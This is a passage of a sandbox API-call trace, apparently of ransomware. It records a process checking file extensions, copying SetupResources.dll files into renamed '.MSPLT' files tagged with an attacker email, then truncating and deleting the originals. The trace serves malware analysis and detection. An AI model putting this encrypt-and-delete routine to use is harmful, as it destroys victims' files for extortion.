-1 [0169.363] lstrlenW (lpString=".7z") returned 3 [0169.363] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.363] lstrlenW (lpString=".dbf") returned 4 [0169.363] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.363] lstrlenW (lpString=".1cd") returned 4 [0169.363] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.363] lstrlenW (lpString=".jpg") returned 4 [0169.363] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.364] lstrlenW (lpString=".doc") returned 4 [0169.364] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.364] lstrlenW (lpString=".docx") returned 5 [0169.364] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.364] lstrlenW (lpString=".pdf") returned 4 [0169.364] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.364] lstrlenW (lpString=".xls") returned 4 [0169.364] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.364] lstrlenW (lpString=".xlsx") returned 5 [0169.364] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.364] lstrlenW (lpString=".ppt") returned 4 [0169.364] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.364] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.364] lstrlenW (lpString=".zip") returned 4 [0169.364] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.364] lstrlenW (lpString=".rar") returned 4 [0169.364] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.364] lstrlenW (lpString=".bz2") returned 4 [0169.364] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.364] lstrlenW (lpString=".7z") returned 3 [0169.364] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.364] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.364] lstrlenW (lpString=".dbf") returned 4 [0169.364] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.364] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.364] lstrlenW (lpString=".1cd") returned 4 [0169.364] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.364] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.365] lstrlenW (lpString=".jpg") returned 4 [0169.365] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.365] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0169.365] lstrlenW (lpString="SetupResources.dll") returned 18 [0169.365] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0169.365] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=18776) returned 1 [0169.365] CloseHandle (hObject=0x300) returned 1 [0169.365] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll")) returned 0x80 [0169.365] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.365] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0169.366] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.366] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.366] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0169.366] GetLastError () returned 0x0 [0169.366] ReadFile (in: hFile=0x300, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x4958, lpOverlapped=0x0) returned 1 [0169.369] WriteFile (in: hFile=0x2d4, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x4960, lpOverlapped=0x0) returned 1 [0169.371] ReadFile (in: hFile=0x300, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0169.371] WriteFile (in: hFile=0x2d4, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0169.371] SetEndOfFile (hFile=0x2d4) returned 1 [0169.371] CloseHandle (hObject=0x2d4) returned 1 [0169.380] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.380] SetEndOfFile (hFile=0x300) returned 1 [0169.381] CloseHandle (hObject=0x300) returned 1 [0169.382] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.382] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1031\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1031\\setupresources.dll")) returned 1 [0169.382] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.383] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.383] lstrlenW (lpString=".doc") returned 4 [0169.383] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.383] lstrlenW (lpString=".docx") returned 5 [0169.383] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.383] lstrlenW (lpString=".pdf") returned 4 [0169.383] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.383] lstrlenW (lpString=".xls") returned 4 [0169.383] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.383] lstrlenW (lpString=".xlsx") returned 5 [0169.383] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.383] lstrlenW (lpString=".ppt") returned 4 [0169.383] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.383] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.383] lstrlenW (lpString=".zip") returned 4 [0169.383] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.383] lstrlenW (lpString=".rar") returned 4 [0169.383] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.383] lstrlenW (lpString=".bz2") returned 4 [0169.383] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.383] lstrlenW (lpString=".7z") returned 3 [0169.383] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.383] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.383] lstrlenW (lpString=".dbf") returned 4 [0169.383] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.383] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.384] lstrlenW (lpString=".1cd") returned 4 [0169.384] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.384] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.384] lstrlenW (lpString=".jpg") returned 4 [0169.384] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.384] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.384] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.384] lstrlenW (lpString=".doc") returned 4 [0169.384] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.384] lstrlenW (lpString=".docx") returned 5 [0169.384] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.384] lstrlenW (lpString=".pdf") returned 4 [0169.384] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.384] lstrlenW (lpString=".xls") returned 4 [0169.384] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.384] lstrlenW (lpString=".xlsx") returned 5 [0169.384] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.384] lstrlenW (lpString=".ppt") returned 4 [0169.384] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.384] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.939] lstrlenW (lpString=".zip") returned 4 [0169.939] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.939] lstrlenW (lpString=".rar") returned 4 [0169.939] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.939] lstrlenW (lpString=".bz2") returned 4 [0169.939] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.939] lstrlenW (lpString=".7z") returned 3 [0169.949] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.949] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.949] lstrlenW (lpString=".dbf") returned 4 [0169.949] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.950] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.950] lstrlenW (lpString=".1cd") returned 4 [0169.950] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.950] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\SetupResources.dll") returned 45 [0169.950] lstrlenW (lpString=".jpg") returned 4 [0169.950] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.950] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0169.950] lstrlenW (lpString="SetupResources.dll") returned 18 [0169.950] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0170.240] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=19288) returned 1 [0170.240] CloseHandle (hObject=0x2c0) returned 1 [0170.240] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll")) returned 0x80 [0170.269] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.269] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0170.269] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.270] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.270] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0170.486] GetLastError () returned 0x0 [0170.486] ReadFile (in: hFile=0x2c0, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x4b58, lpOverlapped=0x0) returned 1 [0170.495] WriteFile (in: hFile=0x2d4, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x4b60, lpOverlapped=0x0) returned 1 [0170.497] ReadFile (in: hFile=0x2c0, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0170.497] WriteFile (in: hFile=0x2d4, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0170.497] SetEndOfFile (hFile=0x2d4) returned 1 [0170.497] CloseHandle (hObject=0x2d4) returned 1 [0170.504] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0170.504] SetEndOfFile (hFile=0x2c0) returned 1 [0170.505] CloseHandle (hObject=0x2c0) returned 1 [0170.505] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.506] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll")) returned 1 [0170.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.506] lstrlenW (lpString=".doc") returned 4 [0170.506] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.506] lstrlenW (lpString=".docx") returned 5 [0170.506] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.506] lstrlenW (lpString=".pdf") returned 4 [0170.506] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.506] lstrlenW (lpString=".xls") returned 4 [0170.506] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.506] lstrlenW (lpString=".xlsx") returned 5 [0170.506] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.506] lstrlenW (lpString=".ppt") returned 4 [0170.507] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.507] lstrlenW (lpString=".zip") returned 4 [0170.507] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.507] lstrlenW (lpString=".rar") returned 4 [0170.507] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.507] lstrlenW (lpString=".bz2") returned 4 [0170.507] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.507] lstrlenW (lpString=".7z") returned 3 [0170.507] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.507] lstrlenW (lpString=".dbf") returned 4 [0170.507] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.507] lstrlenW (lpString=".1cd") returned 4 [0170.507] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.507] lstrlenW (lpString=".jpg") returned 4 [0170.507] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.507] lstrlenW (lpString=".doc") returned 4 [0170.507] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.507] lstrlenW (lpString=".docx") returned 5 [0170.507] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.507] lstrlenW (lpString=".pdf") returned 4 [0170.508] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.508] lstrlenW (lpString=".xls") returned 4 [0170.508] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.508] lstrlenW (lpString=".xlsx") returned 5 [0170.508] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.508] lstrlenW (lpString=".ppt") returned 4 [0170.508] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.508] lstrlenW (lpString=".zip") returned 4 [0170.508] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.508] lstrlenW (lpString=".rar") returned 4 [0170.508] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.508] lstrlenW (lpString=".bz2") returned 4 [0170.508] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.508] lstrlenW (lpString=".7z") returned 3 [0170.508] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.508] lstrlenW (lpString=".dbf") returned 4 [0170.508] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.508] lstrlenW (lpString=".1cd") returned 4 [0170.508] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 45 [0170.508] lstrlenW (lpString=".jpg") returned 4 [0170.508] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.509] Sleep (dwMilliseconds=0x64) [0171.077] Sleep (dwMilliseconds=0x64) [0171.363] Sleep (dwMilliseconds=0x64) [0171.699] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0171.699] lstrlenW (lpString="SetupResources.dll") returned 18 [0171.699] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0171.699] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=15192) returned 1 [0171.699] CloseHandle (hObject=0x378) returned 1 [0171.699] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll")) returned 0x80 [0171.699] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.699] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0171.699] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.699] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.699] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0171.700] GetLastError () returned 0x0 [0171.700] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x3b58, lpOverlapped=0x0) returned 1 [0171.806] WriteFile (in: hFile=0x37c, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x3b60, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x3b60, lpOverlapped=0x0) returned 1 [0171.807] ReadFile (in: hFile=0x378, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0171.808] WriteFile (in: hFile=0x37c, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0171.808] SetEndOfFile (hFile=0x37c) returned 1 [0171.808] CloseHandle (hObject=0x37c) returned 1 [0171.809] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0171.809] SetEndOfFile (hFile=0x378) returned 1 [0171.810] CloseHandle (hObject=0x378) returned 1 [0171.810] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.811] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll")) returned 1 [0171.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.811] lstrlenW (lpString=".doc") returned 4 [0171.811] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.811] lstrlenW (lpString=".docx") returned 5 [0171.811] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.811] lstrlenW (lpString=".pdf") returned 4 [0171.811] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.811] lstrlenW (lpString=".xls") returned 4 [0171.811] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.811] lstrlenW (lpString=".xlsx") returned 5 [0171.811] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.811] lstrlenW (lpString=".ppt") returned 4 [0171.811] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.812] lstrlenW (lpString=".zip") returned 4 [0171.812] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.812] lstrlenW (lpString=".rar") returned 4 [0171.812] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.812] lstrlenW (lpString=".bz2") returned 4 [0171.812] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.812] lstrlenW (lpString=".7z") returned 3 [0171.812] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.812] lstrlenW (lpString=".dbf") returned 4 [0171.812] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.812] lstrlenW (lpString=".1cd") returned 4 [0171.812] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.812] lstrlenW (lpString=".jpg") returned 4 [0171.812] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.812] lstrlenW (lpString=".doc") returned 4 [0171.812] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.812] lstrlenW (lpString=".docx") returned 5 [0171.812] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.812] lstrlenW (lpString=".pdf") returned 4 [0171.812] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.812] lstrlenW (lpString=".xls") returned 4 [0171.813] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.813] lstrlenW (lpString=".xlsx") returned 5 [0171.813] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.813] lstrlenW (lpString=".ppt") returned 4 [0171.813] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.813] lstrlenW (lpString=".zip") returned 4 [0171.813] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.813] lstrlenW (lpString=".rar") returned 4 [0171.813] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.813] lstrlenW (lpString=".bz2") returned 4 [0171.813] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.813] lstrlenW (lpString=".7z") returned 3 [0171.813] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.813] lstrlenW (lpString=".dbf") returned 4 [0171.813] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0171.813] lstrlenW (lpString=".1cd") returned 4 [0171.813] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.813] lstrlenW 